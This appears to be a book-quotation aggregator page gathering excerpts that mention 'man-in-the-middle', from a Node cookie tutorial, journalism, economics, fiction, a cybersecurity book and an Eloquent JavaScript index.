Regular cookies If you were to fire some HTTP requests off to the preceding server using curl(1) without the Cookie header field, both of the console.log() calls would output an empty object: $ curl http://localhost:3000/ {} {} Now try sending a few cookies. You’ll see that both cookies are available as properties of req.cookies: $ curl http://localhost:3000/ -H "Cookie: foo=bar, bar=baz" { foo: 'bar', bar: 'baz' } {} Signed cookies Signed cookies are better suited for sensitive data, as the integrity of the cookie data can be verified, helping to prevent man-in-the-middle attacks. Signed cookies are placed in the req.signedCookies object when valid. The reasoning behind having two separate objects is that it shows the developer’s intention. If you were to place both signed and unsigned cookies in the same object, a regular cookie could be crafted to contain data to mimic a signed cookie. A signed cookie looks something like tobi.DDm3AcVxE9oneYnbmpqxoyhyKsk, where the content to the left of the period (.) is the cookie’s value, and the content to the right is the secret hash generated on the server with SHA-1 HMAC (hash-based message authentication code).


pages: 339 words: 103,546

Blood and Oil: Mohammed Bin Salman's Ruthless Quest for Global Power by Bradley Hope, Justin Scheck

augmented reality, Ayatollah Khomeini, clean water, coronavirus, distributed generation, Donald Trump, Downton Abbey, Elon Musk, Exxon Valdez, Google Earth, high net worth, Jeff Bezos, Marc Andreessen, Mark Zuckerberg, MITM: man-in-the-middle, new economy, Peter Thiel, ride hailing / ride sharing, Sand Hill Road, Silicon Valley, South of Market, San Francisco, sovereign wealth fund, starchitect, Steve Jobs, Tim Cook: Apple, trade route, Travis Kalanick, Uber for X, urban planning, women in the workforce, young professional, zero day

Wearing an open-necked shirt, Mohammed referred to advances in medicine that could make it possible for NEOM residents to live much longer than anyone in history. He might live hundreds of years, he said, explaining that he’d already begun investing in longevity research. One guest was unnerved: Did he think he would be ruler of Saudi Arabia until he was in his three hundreds? Was this the most powerful man in the Middle East? Chapter 18 Cold Blood October 2, 2018 As Jamal Khashoggi landed in Istanbul just before 4 a.m., the fifteen-man kill team was already getting into place. Zipping through customs, Khashoggi made his way to his new apartment in Zeytinburnu, on the European side of the city. The plan was to take a nap at what was to become his marital home with fiancée Hatice Cengiz before grabbing a quick meal nearby.


Wireless by Charles Stross

anthropic principle, back-to-the-land, Benoit Mandelbrot, Buckminster Fuller, Cepheid variable, cognitive dissonance, colonial exploitation, cosmic microwave background, epigenetics, finite state, Georg Cantor, gravity well, hive mind, jitney, Khyber Pass, lifelogging, Magellanic Cloud, mandelbrot fractal, MITM: man-in-the-middle, peak oil, phenotype, Pluto: dwarf planet, security theater, sensible shoes, Turing machine, undersea cable

Gregor waves hesitantly, and Brundle alters course. “Running late,” he pants, kicking at the pigeons until they flap away to make space for him at the other end of the bench. “Really?” Brundle nods. “They should be coming over the horizon in another five minutes.” “How did you engineer it?” Gregor isn’t particularly interested, but technical chitchat serves to pass the remaining seconds. “Man-in-the-middle, ramified by all their intelligence assessments.” Brundle looks self-satisfied. “Understanding their caste specialization makes it easier. Two weeks ago we told the GRU that MacNamara was using the NP-101 program as cover for a preemptive D-SLAM strike. At the same time we got the NOAA to increase their mapping-launch frequency, and pointed the increased level of Soviet activity out to our sources in SAC.


pages: 401 words: 112,784

Hard Times: The Divisive Toll of the Economic Slump by Tom Clark, Anthony Heath

Affordable Care Act / Obamacare, British Empire, business cycle, Carmen Reinhart, credit crunch, Daniel Kahneman / Amos Tversky, debt deflation, deindustrialization, Etonian, eurozone crisis, falling living standards, full employment, Gini coefficient, hedonic treadmill, hiring and firing, income inequality, interest rate swap, invisible hand, John Maynard Keynes: Economic Possibilities for our Grandchildren, Kenneth Rogoff, labour market flexibility, low skilled workers, MITM: man-in-the-middle, mortgage debt, new economy, Northern Rock, obamacare, oil shock, plutocrats, Plutocrats, price stability, quantitative easing, Right to Buy, Ronald Reagan, science of happiness, statistical model, The Wealth of Nations by Adam Smith, unconventional monetary instruments, War on Poverty, We are the 99%, women in the workforce, working poor

The big difference concerns wages, which have subsequently climbed by only 0.6% annually at the median.17 That implies that the typical employee has now been missing out on something like three-quarters of the extra prosperity that America has been generating over 40 years. The graph below captures this great divergence for male workers, for whom it has been most acute. While overall American output has roughly doubled since the 1970s, mostly because of rising productivity, that the figure shows that the pay of the man in the middle, the median male worker, has barely budged. The woman in the middle has not fared quite so badly, but her modest progress has certainly not made up for the difficulties of the men: typical working-age household incomes in 2010 were stuck at the levels of the late 1980s.18 This grim picture is not the product of interpretations or definitions: tinker with the composition of remuneration – by adding in pensions or healthcare, for instance – and it does not brighten.20 The old story of a rising tide lifting all boats has simply ceased to apply.


pages: 385 words: 115,697

The Forever War by Dexter Filkins

animal electricity, friendly fire, Khyber Pass, MITM: man-in-the-middle, Thomas L Friedman

The orange jumpsuit: you knew right away that stood for Abu Ghraib, the place where the American soldiers had humiliated the Iraqi prisoners and taken photos for souvenirs. You knew right then the video wasn’t going to end well. But in the video, the young man seemed remarkably calm; as if he hadn’t imagined what was coming. Five men stood behind him, each wearing a mask and black clothing. The pale-skinned young man introduced himself. “My name is Nicholas Berg, from West Chester, Pennsylvania.” The masked man in the middle began reading from a script. He had a hoarse, guttural voice, not the voice of a gentle man. “Where is the sense of honor, where is the rage?” the masked man asked. “Where is the anger for God’s religion?” Then, with a little flip of his hand, the man with the hoarse voice handed his script to a man on his left. It was a nonchalant gesture, the kind an executive would make when he wanted his personal assistant to take his briefcase.


pages: 379 words: 113,656

Six Degrees: The Science of a Connected Age by Duncan J. Watts

Berlin Wall, Bretton Woods, business process, corporate governance, Drosophila, Erdős number, experimental subject, fixed income, Frank Gehry, Geoffrey West, Santa Fe Institute, industrial cluster, invisible hand, Long Term Capital Management, market bubble, Milgram experiment, MITM: man-in-the-middle, Murray Gell-Mann, Network effects, new economy, Norbert Wiener, Paul Erdős, peer-to-peer, rolodex, Ronald Coase, scientific worldview, Silicon Valley, supply-chain management, The Nature of the Firm, The Wealth of Nations by Adam Smith, Toyota Production System, transaction costs, transcontinental railway, Vilfredo Pareto, Y2K

To take a more prosaic example, in early 1999, when Shawn Fanning was a nineteen-year-old student at Northeastern University, he designed a piece of code to help a friend download MP3 music files from the Internet. The result, a program they nicknamed Napster, became an overnight phenomenon, attracting tens of millions of users and the ire of the entire recording industry, and throwing Fanning into the midst of a worldwide commercial, legal, and ethical maelstrom. At least for a while, Fanning was the man in the middle, lionized by some and demonized by others, quoted in business papers and pictured on magazine covers. Before finally being forced to charge fees for its music-sharing services, Napster (now largely defunct) and Fanning had succeeded in striking a deal with the global publishing giant Bertelsmann. Not a bad effort for a college kid! Apparently not, but whose effort was it really? The software that Fanning created was a neat trick, no doubt about it.


pages: 397 words: 114,841

High Steel: The Daring Men Who Built the World's Greatest Skyline by Jim Rasenberger

collective bargaining, Donald Trump, East Village, illegal immigration, MITM: man-in-the-middle, strikebreaker, Tacoma Narrows Bridge, union organizing, urban planning, young professional

Sometimes titled “Lunchtime on a Beam” or simply “Men on a Beam,” this famous photograph was shot in late September of 1932, 800 feet over Sixth Avenue during the construction of the RCA Building, as part of an elaborate Rockefeller Center publicity effort. It is often taken, incorrectly, for a Lewis Hine photo; in fact, it was shot by a publicity photographer named Hamilton Wright, Jr. As for the identity of the ironworkers, many Mohawks are convinced that the fourth from the left is Joe Jocks of Kahnawake, while Newfoundlanders insist that the shirtless man in the middle is Ray Costello of Conception Harbour. Captions on other photographs taken that same day identify the three men on the far left as John O’Rielly [sic], George Covan, and Joseph Eckner. The shirtless man whom Newfoundlanders believe to be Ray Costello is identified elsewhere as Howard Kilgore (though people who knew Costello swear it’s he) and the next three are identified as William Birger, Joe Curtis, and John Portla.


pages: 409 words: 112,055

The Fifth Domain: Defending Our Country, Our Companies, and Ourselves in the Age of Cyber Threats by Richard A. Clarke, Robert K. Knake

A Declaration of the Independence of Cyberspace, Affordable Care Act / Obamacare, Airbnb, Albert Einstein, Amazon Web Services, autonomous vehicles, barriers to entry, bitcoin, Black Swan, blockchain, borderless world, business cycle, business intelligence, call centre, Cass Sunstein, cloud computing, cognitive bias, commoditize, computer vision, corporate governance, cryptocurrency, data acquisition, DevOps, don't be evil, Donald Trump, Edward Snowden, Exxon Valdez, global village, immigration reform, Infrastructure as a Service, Internet of things, Jeff Bezos, Julian Assange, Kubernetes, Mark Zuckerberg, Metcalfe’s law, MITM: man-in-the-middle, move fast and break things, move fast and break things, Network effects, open borders, platform as a service, Ponzi scheme, ransomware, Richard Thaler, Sand Hill Road, Schrödinger's Cat, self-driving car, shareholder value, Silicon Valley, Silicon Valley startup, Skype, smart cities, Snapchat, software as a service, Steven Levy, Stuxnet, technoutopianism, Tim Cook: Apple, undersea cable, WikiLeaks, Y2K, zero day

Against his initial instincts, he green-lit an audacious idea from his incident response team, who argued that instead of trying to get the adversary out of the network quickly, they needed to keep the adversary inside their network, to try to understand their intent and interests. They proposed firewalling off the intruder to limit what information he could access, and then doing their own man-in-the-middle attack to compromise his command and control and learn his tactics and techniques. “I’ve been on the job for three months, and I’m like, ‘Holy shit, you’ve got to be kidding me.’” But Gagnon saw the value in the intelligence he could collect. “So, I said I will do this once, but I will never do it again.” But he did do it again. In fact, he did it more than two thousand times. That first incident made Gagnon realize that the attacks his company was suffering were not opportunistic, but rather well planned.


pages: 469 words: 124,784

Moon Shot: The Inside Story of America's Apollo Moon Landings by Jay Barbree, Howard Benedict, Alan Shepard, Deke Slayton, Neil Armstrong

Charles Lindbergh, clockwatching, gravity well, invisible hand, Kickstarter, low earth orbit, MITM: man-in-the-middle, operation paperclip, orbital mechanics / astrodynamics, place-making

They were test pilots, and he understood them. He was a superb boss. Alan, as chief of the Astronaut Office, was responsible for day-to-day operations. Astronauts were needed for spacecraft tests, for design reviews, for newspaper interviews. With equanimity, he distributed these seemingly limitless tasks to a very limited number of “his boys.” He was an impenetrable barrier to inappropriate or untimely requests. He was “the man in the middle” and handled it well. Moon Shot is their story. Much more than the story of their flights in space, it details their central role in the most exciting adventure in history. Jay Barbree, one of the world’s most experienced space journalists, reported the triumphs and the tragedies from the dawn of the space age. He is exceptionally well qualified to recall and record the remarkable events and emotions of the time.


pages: 468 words: 124,573

How to Build a Billion Dollar App: Discover the Secrets of the Most Successful Entrepreneurs of Our Time by George Berkowski

Airbnb, Amazon Web Services, barriers to entry, Black Swan, business intelligence, call centre, crowdsourcing, disruptive innovation, en.wikipedia.org, game design, Google Glasses, Google Hangouts, Google X / Alphabet X, iterative process, Jeff Bezos, Jony Ive, Kickstarter, knowledge worker, Lean Startup, loose coupling, Marc Andreessen, Mark Zuckerberg, minimum viable product, MITM: man-in-the-middle, move fast and break things, move fast and break things, Network effects, Oculus Rift, Paul Graham, QR code, Ruby on Rails, self-driving car, Silicon Valley, Silicon Valley startup, Skype, Snapchat, social graph, software as a service, software is eating the world, Steve Jobs, Steven Levy, Travis Kalanick, ubercab, Y Combinator

The best apps (and services, companies, etc. in general) can grow only if they are ‘net-adding’ users, i.e. they are adding more users than they are losing. That’s definitely not the easiest thing to do – and you’ll find that you’ll need to employ numerous simultaneous strategies to make it work. So what are the important things to get right in order to delight people? Design is one. If you’ve used the Hailo app you’ll have noticed there is a little blue man in the middle of the app who denotes your current location. In the very first version of Hailo, this little blue guy (whose nickname is Barty – named after a summer intern) was just a blue pin. The pin was clear, simple and well recognised. One of our designers – a rather emo-looking fellow, who plays in a band, loves tattoos and used to make video games at Electronic – didn’t think it was good enough. One day he told me he wasn’t happy with this impersonal feel of our passenger app; he said it was lacking something.


pages: 381 words: 120,361

Sunfall by Jim Al-Khalili

airport security, artificial general intelligence, augmented reality, Carrington event, cosmological constant, cryptocurrency, dark matter, David Attenborough, Fellow of the Royal Society, Intergovernmental Panel on Climate Change (IPCC), Internet of things, invisible hand, Kickstarter, mass immigration, megacity, MITM: man-in-the-middle, off grid, pattern recognition, Silicon Valley, smart cities, sorting algorithm, South China Sea, stem cell, Stephen Hawking, Turing test

Any attempt to break the code disturbs the delicate quantum entangled state and sends an alert to the source, which then immediately switches to a different encryption key. Wasn’t that the subject of last week’s lecture – something about the Ekert 91 protocol?’ Shireen grinned, suddenly feeling even more pleased with herself. ‘I know, foolproof, right? And you know as well as I do that every cyb in the world is looking for new attack strategies that target vulnerabilities in the system. And if you ask any of them they’ll tell you that the obvious man-in-the-middle attacks and the photon number splitting attacks don’t work. In fact, government and corporation sites don’t even bother following up on these cyber alerts any more. And that’s the beauty of it; they’re so cocksure their encryptions can’t be broken that no one is watching me.’ ‘And that’s what you think you’ve done, is it? You’ve found a way of getting hold of a quantum encryption key without detection … a window where the laws of physics are no longer in control?’


pages: 481 words: 121,300

Why geography matters: three challenges facing America : climate change, the rise of China, and global terrorism by Harm J. De Blij

agricultural Revolution, airport security, Anton Chekhov, Ayatollah Khomeini, Berlin Wall, British Empire, colonial exploitation, complexity theory, computer age, crony capitalism, demographic transition, Deng Xiaoping, Eratosthenes, European colonialism, F. W. de Klerk, failed state, Fall of the Berlin Wall, Francis Fukuyama: the end of history, global village, illegal immigration, Internet Archive, John Snow's cholera map, Khyber Pass, manufacturing employment, megacity, Mercator projection, MITM: man-in-the-middle, Nelson Mandela, out of africa, RAND corporation, risk tolerance, Ronald Reagan, South China Sea, special economic zone, Thomas Malthus, trade route, transatlantic slave trade, UNCLOS, UNCLOS

207 problems, France's quarrel with the United States over Iraq, prospects for the euro and EU enlargement, and the issue of a European Constitution, then very much in the news while it was being prepared, a momentous event in the EU's history. I went on too long and left no time for a Q&A session, but asked anyone with comments to come up to the lectern afterward. Soon a group of about a dozen listeners converged on me, and I could see that some of them were quite angry. "You were unfair to Germany's government!" shouted a man in the middle of the pack. Before I could answer, someone started a bitter complaint about my view of the French. "No," said the vociferous German, "he was quite right about you French. You want to run the European Union, but the British won't let you do it." In a few moments the Europeans among the group were in a shouting match with each other, no longer interested in arguing with me. When I left the room the dispute continued undiminished.


pages: 385 words: 133,839

The Coke Machine: The Dirty Truth Behind the World's Favorite Soft Drink by Michael Blanding

carbon footprint, clean water, collective bargaining, corporate social responsibility, Exxon Valdez, Gordon Gekko, Internet Archive, laissez-faire capitalism, market design, MITM: man-in-the-middle, Naomi Klein, Nelson Mandela, New Journalism, Ponzi scheme, profit motive, Ralph Nader, rolodex, Ronald Reagan, shareholder value, The Wealth of Nations by Adam Smith, Thorstein Veblen, union organizing, Upton Sinclair

He sends her to school with bodyguards and forbids her to go outside. “Sometimes she asks me why she can’t go out and play like a normal girl,” he says. “But it would destroy me as a person if anything happened to her.” After the initial spate of violence, the threats against the union subsided somewhat, but not before Galvis himself was subject to attack. He was driving home with his bodyguards in August 2003, when he turned the corner to find a man in the middle of the street pointing a pistol at the car. One of his bodyguards opened the door to shoot, and the man started firing. After a few exchanges of gunfire, the assailant drove off on his mo­ torbike, and Galvis reported the incident to the police as an attempt on his life. He heard nothing until 2007 when the attorney general’s office informed him there was an investigation against him for making a false claim.


Jennifer Morgue by Stross, Charles

call centre, correlation does not imply causation, disintermediation, dumpster diving, Etonian, haute couture, interchangeable parts, Maui Hawaii, MITM: man-in-the-middle, mutually assured destruction, planetary scale, RFID, Silicon Valley, Skype, slashdot, stem cell, telepresence, traveling salesman, Turing machine

SLIDE 3: Grainy black-and-white photographs, evidently taken from TV screens: a long cylindrical structure grasped in the claws of an enormous grab. From below, thin streamers rise up towards it. "BLUE HADES took exception to the intrusion into their territory and chose to exercise their salvage rights under Article Five, Clause Four of the Benthic Treaty. Hence the tentacles. Now ..." SLIDE 1 (Repeat): This time the man in the middle is circled with a red highlighter. "This fellow in the middle is Ellis Billington, as he looked thirty years ago. Ellis was brilliant but not well socialized back then. He was attached to the 'B' team as an observer, tasked with examining the circuitry of the cipher machine they hoped to recover from the sub's control room. I didn't pay much attention to him at the time, which was a mistake.


Rainbows End by Vernor Vinge

Drosophila, failed state, MITM: man-in-the-middle, technological singularity, Vernor Vinge

It would be a gross under-employment of everyone’s talent. If this is the scam, you will be the heroes of the day, my hands in disabling those little boxes you and your friends planted — but your fame will likely be posthumous. My condolences! (2)To sabotage some component of the labs, maybe in a way that won’t become evident till much later disasters. This is almost as stupid as (1). (3)To install (or cover) some fiendishly clever Man-in-the-Middle software that gives Alfred de facto ownership of research done in that part of lab that you, Robert, infested for him. This would be cool, and it is my personal favorite (see my discussion of fruit flies in Chapter 3). Unfortunately for Alfred, this caper is so far blown that I doubt it will survive the audits that will surely come raining down. In this case, you two can help by grabbing anything that Alfred has not yet hidden


pages: 436 words: 131,430

House of God by Samuel Shem

affirmative action, index card, lateral thinking, medical residency, MITM: man-in-the-middle, Norman Mailer, placebo effect

We entered, the music stopped, all heads turned to us. The Law. Silence. 'Too calm,' I whispered to Quick as we watched the barkeep slowly mop the floor and deny any shooting in his establishment Then Quick supplied the clue." "The slop the barman mopped was red. Beer is not red, and yet red blood is," said Quick. "I then spotted three men sitting too close together against the wall, and commanded them to move. They did, and the man in the middle fell over, dead. Such was their surprise that we refrained from having to 'stick them' with our lead nightsticks, thus avoiding many months of work with Cohen around the gnawing question of guilt. A dangerous time." "The raw red time when words give way to acts," said Quick. "We must all take care," said the redhead. "With luck we shall see you again at sixteen hundred in the fine post meridian.


pages: 416 words: 129,308

The One Device: The Secret History of the iPhone by Brian Merchant

Airbnb, animal electricity, Apple II, Apple's 1984 Super Bowl advert, citizen journalism, Claude Shannon: information theory, computer vision, conceptual framework, Douglas Engelbart, Dynabook, Edward Snowden, Elon Musk, Ford paid five dollars a day, Frank Gehry, global supply chain, Google Earth, Google Hangouts, Internet of things, Jacquard loom, John Gruber, John Markoff, Jony Ive, Lyft, M-Pesa, MITM: man-in-the-middle, more computing power than Apollo, Mother of all demos, natural language processing, new economy, New Journalism, Norbert Wiener, offshore financial centre, oil shock, pattern recognition, peak oil, pirate software, profit motive, QWERTY keyboard, ride hailing / ride sharing, rolodex, Silicon Valley, Silicon Valley startup, skunkworks, Skype, Snapchat, special economic zone, speech recognition, stealth mode startup, Stephen Hawking, Steve Ballmer, Steve Jobs, Steve Wozniak, Steven Levy, Tim Cook: Apple, Turing test, uber lyft, Upton Sinclair, Vannevar Bush, zero day

“They would be able to sniff the traffic,” he says, meaning intercept the data passing through the network. “Once you’re connected to the network, they could start trying to throw attacks at your phone… But for the most part, the Pineapple is more for sniffing traffic.” If I logged on to Gmail, for instance, the hackers could force me to go somewhere else, a site of their choosing. Then they could launch a man-in-the-middle attack. “If you went to Facebook and went to your bank account, they’d be able to see that information too,” he says. “So, yeah, you just want to be careful not to connect to any Wi-Fi.” Okay, but how common is this, really? “Pineapples?” Ronnie says. “I can go buy one for a hundred, a hundred twenty bucks. They’re very, very, very common. Especially here.” Def Con is one of the largest and most notorious hacker gatherings in the world.


pages: 403 words: 138,026

Arabian Sands by Wilfred Thesiger

back-to-the-land, clean water, Etonian, Fellow of the Royal Society, MITM: man-in-the-middle, the market place

As I wandered through the town I knew that they regarded me as an intruder; I myself felt that I was little better than a tourist. I could have gone to Bahrain by aeroplane from Sharja but I preferred to go there by dhow. The journey should have taken four days but lasted eleven. The naukhada, or skipper, was an old man, nearly blind, who spent most of his time asleep on the poop. The mate, an energetic Negro, described what he saw and the naukhada told him where to go. Once he woke the old man in the middle of the night to consult him. The naukhada gave his orders, but when the mate said ‘Nonsense, Uncle!’, he went grumbling back to sleep. The first night it blew a gale. The seas broke over the ship and I was very sick. We had to shelter under the Persian coast, and there we remained for three days, since the wind, when it moderated, was against us. While waiting for the wind to shift, we were joined by seven other dhows, great ocean-going booms, sailing back from Zanzibar to Kuwait.


Eloquent JavaScript by Marijn Haverbeke

always be closing, domain-specific language, Donald Knuth, en.wikipedia.org, Firefox, hypertext link, job satisfaction, MITM: man-in-the-middle, premature optimization, slashdot, web application, WebSocket

., 2 leaf node, 229 leak, 225, 285 learning, 2, 6, 371 left (CSS), 240–242, 244 LEGO, 168 length property for arrays, 61, 336 for strings, 53, 56, 61, 74, 409 less than, 16 let keyword, 24, 25, 43, 65, 75, 76, 130 level, 266, 267, 273, 275, 284 Level class, 267 lexical scoping, 44 library, 230, 334, 356, 357 license, 169 line, 24, 32, 161, 287, 289–294, 307, 420 line break, 14, 161 line comment, 35, 156 line drawing, 350, 424 line width, 290, 297 lines of code, 211 lineTo method, 290–291 lineWidth property, 290 link (HTML tag), 277 linked list, 79, 410, 426 links, 222, 230–231, 251, 252, 344 linter, 173 Liskov, Barbara, 96 list (exercise), 79, 410 listen method, 360 listening (TCP), 220, 360 literal expression, 23, 146, 206, 208 live data structure, 227, 233, 240, 419 live view, 372, 373, 387, 426 lives (exercise), 285 load event, 258, 295–296, 303, 326, 421 LoadButton class, 344 local binding, 48, 215, 409 local scope, 43, 212 localhost, 360 localStorage object, 326–327, 383 locked box (exercise), 141, 413 logging, 133 logical operators, 17 long polling, 372–374, 378, 380, 385 loop, 4, 30, 32, 37, 38, 50, 69, 85, 90, 91, 160, 189, 408, 409, 420 termination of, 33 loop body, 31, 85 lycanthropy, 60, 66 M machine code, 3, 213, 391 macro-optimization, 406 magic, 99, 203 mailRoute array, 123 maintenance, 169 malicious script, 224 man-in-the-middle, 317 map, 272, 321 map (data structure), 104 Map class, 105, 109, 195 map method, 88, 91, 94, 99, 104, 120, 191, 268, 340 Marcus Aurelius, 246 match method, 149, 159 matching, 146, 151, 152, 158, 164 algorithm, 152–154 Math object, 56, 61, 75 Math.abs function, 76, 424 Math.acos function, 75 Math.asin function, 75 Math.atan function, 75 Math.ceil function, 76, 278, 302–303 Math.cos function, 75, 241, 242, 421 mathematics, 50, 86 Math.floor, 76, 122, 278, 302–303 Math.max function, 27, 61, 74, 75, 302 Math.min function, 27, 56, 75, 302 Math.PI constant, 75, 293 Math.random function, 75, 122, 271, 330, 404 Math.round function, 76 Math.sin function, 75, 241, 242, 271, 281 Math.sqrt function, 68, 75, 411 Math.tan function, 75 Matrix class, 107–108, 335 matrix example, 107–108, 111 MatrixIterator class, 108 max-height (CSS), 275–276 maximum, 27, 75, 90 max-width (CSS), 275–276 McConnell, Steve, 390 Meadowfield, 117 measurement, 397 measuring, 399 measuring a robot (exercise), 125, 412 media type, 317, 329, 365 meetups, JavaScript, 371 memory, 3, 11 call stack, 24 organization, 12, 47, 60, 65, 77 persistence, 387 speed, 181, 213, 400, 402, 406 structure sharing, 79 mesh, 221 message event, 259 meta key, 252 metaKey property, 252, 349 method, 62, 100, 101 array, 71 HTTP, 312, 317, 360, 367, 373, 375 interface, 98 method attribute, 313 method call, 98 method property, 315 methods object, 363 micro-optimization, 397, 399, 406 Microsoft, 225 Middle East, graph of, 393 mime package, 365 MIME type, 329, 365 mini application, 326 minifiers, 175 minimalism, 265 minimum, 27, 56, 75 minimum (exercise), 56, 408 minus, 13, 165 Miró, Joan, 332 mirror, 298, 308, 421 mirroring, 297–298 MKCOL method, 368–369, 425 mkdir function, 368–369, 425 modification date, 366 modifier key, 252 modular robot (exercise), 177, 414 modularity, 97, 334 module, 168, 169, 177, 272, 355, 356, 375 design, 175 module loader, 355 module object, 172 module system, 169 modulo (remainder) operator, 14, 33, 297, 407, 408, 418, 420 Mongolian vowel separator, 162 monster (exercise), 285, 419 Mosaic, 225 motion, 266 mouse, 26 button, 249, 250, 253 cursor, 253 mouse trail (exercise), 262, 418 mousedown event, 250, 253, 255, 337, 338, 422 mousemove event, 254, 260–262, 338, 350, 418 mouseup event, 253–255 moveTo method, 290, 293 Mozilla, 225 multiple attribute, 324, 325 multiple-choice, 318–319, 323, 324 multiplication, 13, 269–270, 280 multiplier function, 49 music, 265 mutability, 63, 65, 120 N name attribute, 320, 324 namespace, 75 naming, 4, 5, 25–26 NaN (not a number), 14, 17, 18, 130 negation, 16, 17 neighbor, 330, 422 neighbors property, 190 nerd, 158 nesting of arrays, 67 of expressions, 23, 205 of functions, 44 of loops, 38, 408 of objects, 228, 231 in regular expressions, 154 of scope, 44 Netscape, 5, 225 network, 182, 219, 372 abstraction, 194, 316 protocol, 220 reliability, 188 security, 317 speed, 174, 181, 353 network function, 194 new operator, 101 newline character, 14, 38, 147, 156, 161, 268, 422 next method, 107, 197, 412 nextSibling property, 230 Nietzsche, Friedrich, 226 node, 228, 229 node program, 354 node-fetch package, 361 Node.js, 6, 7, 27, 171, 183, 353–369, 372, 373, 375, 387, 398 NodeList type, 230, 239 node_modules directory, 355, 356 nodeName property, 243 nodeType property, 229, 418, 419 nodeValue property, 231 nonbreaking space, 162 normalizing, 396 not a number (NaN), 14, 17, 18, 129 notation, 173 note-taking example, 327 notification, 372 NPM, 169, 171, 173, 174, 176, 177, 355–358, 365, 375, 376, 387, 415 npm program, 356, 357, 365 null, 18, 19, 51, 61, 77, 80, 134 number, 12, 65, 146, 165, 414 conversion to, 19, 28 notation, 12–13 precision of, 13 representation, 12 special values, 14 Number function, 28, 35 number puzzle example, 50–52 Number.isNaN function, 29 O object, 59, 63–65, 97, 112 creation, 77, 101, 328, 401, 403 identity, 65 as map, 272 as module, 169 mutability, 65 property, 27, 61, 75, 76, 99 representation, 77 Object prototype, 99, 100 object shape, 404 Object.assign function, 328, 336 Object.create function, 100, 104, 211 Object.keys function, 64, 80, 195, 410, 417 object-oriented programming, 97, 101, 105, 106, 111, 119, 175 Object.prototype, 104 observation, 399 obstacle, 277, 278 offsetHeight property, 235, 236 offsetWidth property, 235 on method, 362 onclick attribute, 224, 248 onclick property, 337 OpenGL, 289 opening tag, 222 operator, 13, 16, 19, 204, 210, 404 application, 13 optimization, 50, 55, 236, 260, 266, 275, 306, 308, 359, 392, 398–400, 403, 406, 426 option (HTML tag), 319, 324, 425 optional, in pattern, 148 optional arguments, 48, 78 options property, 324 ordering, 220 ordinal package, 171–172 organic growth, 167 organization, 167 outline, 289 output, 16, 26, 27, 133, 134, 211, 353, 422 overflow (CSS), 275–276 overflow, with numbers, 12 overlap, 278 overlay, 238 overriding, 103, 105, 111, 415 overwriting, 367, 369, 378 P p (HTML tag), 222, 235 package, 168, 171, 355, 357 package (reserved word), 26 package manager, 169 package.json file, 357 padding (CSS), 274 page reload, 258, 321, 326 pageX property, 253, 255 pageXOffset property, 236 pageY property, 253, 255 pageYOffset property, 236, 257 Palef, Thomas, 265 panning, 339 paragraph, 222 parallelism, 182, 313 parameter, 27, 42, 43, 46–48, 74, 76, 99, 131, 172 parent node, 249 parentheses arguments, 23, 41, 46, 85, 204 expression, 13 in regular expressions, 149, 151, 152, 162, 413 statement, 27, 29, 31, 33 parentNode property, 230 parse function, 207 parseApply function, 206 parseExpression function, 205 parseINI function, 161, 168 parsing, 77, 129, 161, 203–206, 208, 211, 223, 227, 364, 380 password, 317 password field, 318 path canvas, 290–293, 420 closing, 291 file system, 355, 363 URL, 312, 315, 363, 364, 373, 375 path package, 365 pathfinding, 123, 176, 193, 343 pathfinding (exercise), 405, 406, 426 patience, 350 pattern, 145–147, 157 pausing (exercise), 285, 419 pea soup, recipe analogy, 84 peanuts, in weresquirrel example, 70–71 percent sign, 314 percentage, 94, 257 performance, 154, 174, 212, 236, 266, 306, 359, 391, 393, 397, 399 period character, 27, 61, 74, 147, 156, 165, 336 persistence, 326, 372, 387, 425 persistent data structure, 119, 120, 126, 132, 335, 342, 346, 419 persistent group (exercise), 126 persistent map (exercise), 413 PGroup class, 126, 413 phase, 271, 281 phi coefficient, 66–68 phi function, 68, 76 phone, 252 physics, 277, 281, 393, 418 physics engine, 278 pi, 13, 75, 241, 271, 293 PI constant, 75, 242 pick function, 343 picture, 287, 288, 296, 306, 334, 346 Picture class, 335, 345 picture property, 335 PictureCanvas class, 337, 349 pictureFromImage function, 345 pie chart example, 294, 295, 307, 420 ping request, 190 pink, 336 pipe analogy, 220 pipe character, 152, 414 pipe method, 364, 367 pipeline, 175 pixel, 235, 242, 253, 267, 273, 288, 289, 295, 296, 302, 306, 308, 333, 335, 339, 342, 343, 345, 350, 423 pixel art, 296 PixelEditor class, 340, 347, 349 pizza, in weresquirrel example, 67 platform game, 265, 285 Plauger, P.J., 128 player, 265–267, 275, 278, 281, 284, 296, 303, 305 Player class, 270, 281 plus character, 13, 148, 165 pointer, 230 pointer events, 253–256, 337 pointerPosition function, 338 polling, 247 pollTalks function, 385 polymorphism, 105–106 pop method, 62, 71 Popper, Karl, 234 port, 220, 311, 360 pose, 296 position, of elements on screen, 236 position (CSS), 240, 244, 257, 266, 275 POST method, 313, 314, 321, 374 postMessage method, 259 power example, 42, 48, 50 precedence, 13, 17, 239 predicate function, 88, 92, 95 Prefer header, 374, 380, 385 premature optimization, 50 preventDefault method, 251, 256–258, 282, 321, 339, 423 previousSibling property, 230 primitiveMultiply (exercise), 141, 413 privacy, 225 private (reserved word), 26 private properties, 98, 141–142 process object, 354–355, 364–365 processor, 181, 400 profiling, 50, 399 program, 2, 23, 28 program size, 83, 84, 164, 272 programming, 1 difficulty of, 2 history of, 3 joy of, 1, 2 Programming Is Terrible, 166 programming language, 1–2 creating, 203, 213 DOM, 229 history of, 3 machine language and, 391 Node.js and, 354 power of, 5 programming style, 3, 24, 32, 35, 272 progress bar, 256 project chapter, 117, 203, 265, 333, 371 promise, 200, 416 Promise class, 186, 187, 189, 195, 197, 198, 200, 315, 326, 359, 361, 363, 386, 416 Promise.all function, 190, 199, 200, 416 Promise.reject function, 187 Promise.resolve function, 186, 190 promises package, 359 promptDirection function, 139 promptInteger function, 134 propagation, of events, 249, 250, 257, 258 proper lines (exercise), 350, 424 property access, 27, 61, 129, 348, 403 assignment, 63 definition, 63, 66, 109 deletion, 63, 98 inheritance, 99, 101, 103 model of, 63 naming, 105–107 testing for, 64 protected (reserved word), 26 protocol, 220, 221, 311–312 prototype, 99–104, 111, 211, 215, 417, 426 diagram, 103 prototype property, 101 pseudorandom numbers, 75 public (reserved word), 26 public properties, 98 public space (exercise), 369, 425 publishing (packages), 358 punch card, 3 pure function, 55, 79, 88, 175, 330, 422 push method, 62, 69, 71, 411, 426 pushing data, 372 PUT method, 312–313, 363, 367, 373, 378, 425 Pythagorean theorem, 411, 423 Python, 391 Q quadratic curve, 292 quadraticCurveTo method, 292, 420 query string, 314, 